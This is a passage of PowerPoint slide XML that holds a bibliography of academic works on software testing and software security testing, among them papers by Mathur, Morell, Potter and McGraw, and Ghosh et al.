                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>February </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2010, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>73‐101.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="1430"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="3"/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mathur, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Foundations </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>First edition, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Pearson </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Education,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2008.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="242570" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="3"/>
              <a:tabLst>
                <a:tab pos="274955" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>L. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Morell, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Theory </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Fault‐based </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>IEEE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Transactions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Volume </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>16,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Issue </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>8, 1990, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>844–857.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="264795" indent="-252095">
              <a:lnSpc>
                <a:spcPts val="1430"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="3"/>
              <a:tabLst>
                <a:tab pos="265430" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>B. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Potter </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>G. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>McGraw, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>IEEE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&amp; Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2004, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="130" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>32‐34.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="277495" indent="-264795">
              <a:lnSpc>
                <a:spcPts val="1510"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="3"/>
              <a:tabLst>
                <a:tab pos="278130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>I. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Sommerville, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, Addison </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Wesley,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2001.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="264160" indent="-251460">
              <a:lnSpc>
                <a:spcPts val="1345"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="3"/>
              <a:tabLst>
                <a:tab pos="264795" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>W. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Du and A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mathur, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>for Software Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Environment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Perturbation,”</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="114300" indent="-635">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>International conference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on Dependable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Systems </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Networks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(DSN 2000)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>New </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>York, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>NY, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>June 2000,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>603‐612.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="388620" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="273685" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Ghosh, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>T. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>O'Connor, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>G. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>McGraw, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“An </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Automated Approach for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Identifying </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Potential  Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>IEEE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Symposium </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>California, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1998, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="190" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>104‐14.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="132715" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="276225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Jorgensen, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>hostile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>streams,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACM </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SIGSOFT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software Engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Notes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Volume  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>28, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Issue </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>March </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2003, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>9.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="327025" indent="-314325">
              <a:lnSpc>
                <a:spcPts val="1260"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="327660" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Y. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Huang, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>S. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Huang, </a:t>
            </a:r>
